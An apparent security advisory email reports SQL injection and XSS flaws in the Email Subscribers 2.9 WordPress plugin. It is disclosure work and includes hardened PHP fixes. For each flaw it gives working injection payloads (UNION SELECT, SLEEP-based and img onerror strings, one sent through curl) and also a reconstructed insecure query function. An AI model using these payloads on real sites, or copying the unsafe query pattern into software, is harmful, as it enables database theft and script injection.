Subject: Multiple SQL injections and XSS in Email Subscribers 2.9
Date: Mon, 10 Aug 2015 16:15:43 +0200

Hello,

Plugin: Email Subscribers 2.9 https://wordpress.org/plugins/email-subscribers/


1. Cross-Site Scripting (XSS) (page=es-sendemail)

Authenticated administrators can inject arbitrary HTML/JavaScript code; since the page has no CSRF protection, the request can also be triggered on an administrator's behalf.

Method: POST/GET
Example url: http://localhost/wp-admin/admin.php?page=es-sendemail&search=[xss]
Vulnerable parameters: search (GET,POST), es_email_group (POST)

Example PHP callstack:
/email-subscribers/sendmail/sendmail.php:240

Verification:
http://localhost/wp-admin/admin.php?page=es-sendemail&search=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E


2. Cross-Site Scripting (XSS) (page=es-view-subscribers)

Authenticated administrators can inject arbitrary HTML/JavaScript code (there is no CSRF protection).

Method: GET
Example url: http://localhost/wp-admin/admin.php?page=es-view-subscribers&search=[xss]
Vulnerable parameters: search, sts, cnt

Example PHP callstack:
/email-subscribers/subscribers/view-subscriber-show.php:406

Verification:
http://localhost/wp-admin/admin.php?page=es-view-subscribers&search=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://localhost/wp-admin/admin.php?page=es-view-subscribers&sts=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://localhost/wp-admin/admin.php?page=es-view-subscribers&cnt=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E


3. SQL injection (es_view_subscriber_search())

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).

Method: POST
Example url: http://localhost/wp-admin/admin.php?page=es-view-subscribers&did=[sqli]&ac=resend
Vulnerable parameter: did (GET)

Example PHP callstack:
/email-subscribers/subscribers/view-subscriber-show.php:75
es_cls_sendmail::es_prepare_optin   [/email-subscribers/classes/es-sendmail.php:15]
es_cls_dbquery::es_view_subscriber_search   [/email-subscribers/query/db_subscriber.php:35]
wpdb::get_results

Another example PHP callstack:
/email-subscribers/subscribers/view-subscriber-edit.php:24
es_cls_dbquery::es_view_subscriber_search   [email-subscribers/query/db_subscriber.php:35]
wpdb::get_results


Verification:

curl --cookie "..." --data "frm_es_display=yes&frm_es_bulkaction=1" "http://localhost/wp-admin/admin.php?page=es-view-subscribers&did=1%20OR%20(SELECT%20*%20FROM%20(SELECT%20SLEEP(5))XXX)%20--%20-&ac=resend"


4. SQL injection (es_notification_select())

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection). The attacker needs to know a valid "did" id to exploit this vulnerability.

Method: GET
Url: http://localhost/wp-admin/admin.php?page=es-notification&ac=edit&did=[sqli]
Vulnerable parameter: did

Example PHP callstack:
email-subscribers/notification/notification-edit.php:19
es_cls_notification::es_notification_select   [email-subscribers/query/db_notification.php:14]
wpdb::get_row


Verification (did=1 is valid):
http://localhost/wp-admin/admin.php?page=es-notification&ac=edit&did=1+UNION+SELECT+9999999%2C1%2C0x53514c494e4a454354494f4e%2C1%2C1+order+by+es_note_id+desc+limit+1


5. SQL injection (es_template_select()) + XSS

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/admin.php?page=es-compose&ac=preview&did=[sqli]
Vulnerable param: did

Callstack:
/email-subscribers/compose/compose-preview.php:20
es_cls_compose::es_template_select   [/email-subscribers/query/db_compose.php:14]
wpdb::get_row

Verification:
http://localhost/wp-admin/admin.php?page=es-compose&ac=preview&did=1+union+select+99999999%2C1%2C0x53514c494e4a454354494f4e%2C1%2C5+order+by+es_templ_id+desc+limit++1

http://localhost/wp-admin/admin.php?page=es-compose&ac=preview&did=1%20or%20(SELECT%20*%20FROM%20(SELECT%20SLEEP(5))XXX)--%20-


Additionally, the same parameter ("did") allows authenticated administrators to inject HTML/JavaScript code, resulting in an XSS vulnerability.

Callstack:
/email-subscribers/compose/compose-preview.php:29

Verification:
http://localhost/wp-admin/admin.php?page=es-compose&ac=preview&did=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E


6. SQL injection (es_sentmail_select())

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/admin.php?page=es-sentmail&ac=preview&did=[sqli]
Vulnerable param: did

Example PHP callstack:
/email-subscribers/sentmail/sentmail-preview.php:22
es_cls_sentmail::es_sentmail_select [/email-subscribers/query/db_sentmail.php:14]
wpdb::get_row

Verification:
http://localhost/wp-admin/admin.php?page=es-sentmail&ac=preview&did=1+UNION+SELECT+-1%2C2%2C3%2C4%2C5%2C6%2C7%2C0x53514c494e4a454354494f4e%2C9%2C10%2C11+order+by+es_sent_id+asc+limit+1%3B
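
Items 3 to 6 share one shape: the "did" row id is taken from the request and reaches wpdb::get_row()/get_results() without being bound as a parameter. The following is an added example, not the plugin's code: it reconstructs that shape as an assumption and puts the hardened form next to it. The function names, the table name, the column name es_templ_id and the nonce action are all assumptions chosen for illustration.

```php
<?php
// Added example, not code from the Email Subscribers plugin.
// Assumed names: example_select_unsafe, example_select_safe, example_preview_handler,
// the table suffix 'es_templatetable' and the nonce action 'es_preview_template'.

// Reconstructed vulnerable shape (assumption): the raw request value is concatenated into SQL,
// so did=1 UNION SELECT ... and did=1 OR (SELECT SLEEP(5)) ... are executed as written.
function example_select_unsafe( $did ) {
    global $wpdb;
    $table = $wpdb->prefix . 'es_templatetable';
    $sql   = "SELECT * FROM $table WHERE es_templ_id = $did";
    return $wpdb->get_row( $sql, ARRAY_A );
}

// Hardened shape: validate the id as an integer, then bind it through $wpdb->prepare().
function example_select_safe( $did ) {
    global $wpdb;
    // absint() is abs(intval()): intval keeps only the leading digits, so
    // "1 UNION SELECT ..." and "1 OR (SELECT ..." both become 1 and the appended SQL is dropped;
    // a value with no leading digits becomes 0 and is rejected below.
    $did = absint( $did );
    if ( 0 === $did ) {
        return null;
    }
    $table = $wpdb->prefix . 'es_templatetable';
    // %d is formatted by prepare() as an integer; the value never enters the query as text.
    $sql = $wpdb->prepare( "SELECT * FROM {$table} WHERE es_templ_id = %d", $did );
    return $wpdb->get_row( $sql, ARRAY_A );
}

// Caller side: check capability and a nonce before the lookup, which closes the
// "no CSRF protection" part of each item. The nonce is expected to have been added
// to the preview link with wp_nonce_url( $url, 'es_preview_template' ).
function example_preview_handler() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    check_admin_referer( 'es_preview_template' );
    $did = isset( $_GET['did'] ) ? wp_unslash( $_GET['did'] ) : 0;
    $row = example_select_safe( $did );
    if ( null === $row ) {
        wp_die( 'Invalid id' );
    }
    return $row;
}
```

When checking a fix against the verification URLs above, note that 0x53514c494e4a454354494f4e is the hex encoding of the string SQLINJECTION: on the vulnerable version a UNION payload surfaces that literal in the rendered row, and the SLEEP(5) payloads delay the response by five seconds. With the id cast and bound as above, both requests simply load row 1.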


7. Cross-Site Scripting (XSS) (page=es-sentmail)

Authenticated administrators can inject arbitrary HTML/JavaScript code (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/admin.php?page=es-sentmail&ac=preview&pagenum=[xss]
Vulnerable parameter: pagenum

Example PHP callstack:
/email-subscribers/sentmail/sentmail-preview.php:30

Verification:
http://localhost/wp-admin/admin.php?page=es-sentmail&ac=preview&pagenum=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
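
Items 1, 2, 5 (the XSS part) and 7 are reflected XSS through request values (search, sts, cnt, pagenum, did) echoed back into the admin page. The verification payloads begin with "> to break out of an attribute value, which tells you the values land inside an HTML attribute. The following is an added example, not the plugin's code, showing the input validation and context-specific output escaping that closes them; the function names and the form markup are assumptions.

```php
<?php
// Added example, not code from the Email Subscribers plugin.
// Assumed names: es_example_clean_inputs, es_example_render_search_form.

function es_example_clean_inputs() {
    // Numeric page index (item 7, pagenum): only an integer is ever echoed back.
    $pagenum = isset( $_GET['pagenum'] ) ? absint( $_GET['pagenum'] ) : 1;
    // Free-text filters (search, sts, cnt): sanitize_text_field() strips tags and
    // control bytes on input, but the output escaping below is still required,
    // because a quote or angle bracket that survives must not reach the markup raw.
    $search = isset( $_GET['search'] ) ? sanitize_text_field( wp_unslash( $_GET['search'] ) ) : '';
    $sts    = isset( $_GET['sts'] ) ? sanitize_text_field( wp_unslash( $_GET['sts'] ) ) : '';
    $cnt    = isset( $_GET['cnt'] ) ? sanitize_text_field( wp_unslash( $_GET['cnt'] ) ) : '';
    return compact( 'pagenum', 'search', 'sts', 'cnt' );
}

function es_example_render_search_form( array $in ) {
    // Attribute context: esc_attr() encodes " < > & and ', so "><img src=x onerror=alert(1)>
    // is rendered as the literal text of the value attribute instead of a new element.
    $html  = '<form method="get">';
    $html .= '<input type="hidden" name="page" value="es-view-subscribers">';
    $html .= '<input type="text" name="search" value="' . esc_attr( $in['search'] ) . '">';
    $html .= '<input type="hidden" name="sts" value="' . esc_attr( $in['sts'] ) . '">';
    $html .= '<input type="hidden" name="cnt" value="' . esc_attr( $in['cnt'] ) . '">';
    // Integer already; the cast makes the contract visible at the output site.
    $html .= '<input type="hidden" name="pagenum" value="' . (int) $in['pagenum'] . '">';
    $html .= '</form>';
    // Text context between tags: esc_html() for the same value when it is shown as text.
    $html .= '<p>Results for: ' . esc_html( $in['search'] ) . '</p>';
    return $html;
}

// Usage inside the admin page callback: validate first, escape at every output site.
function es_example_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    echo es_example_render_search_form( es_example_clean_inputs() );
}
```

The rule the example applies is that the escaping function is chosen by where the value lands (esc_attr() inside an attribute, esc_html() between tags, esc_url() in href/src) and applied at the point of output, not once at input; for the "did" parameter of item 5 the integer cast used for the SQL fix already removes every character the XSS payload depends on.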


--
Regards,
Marcin Probola,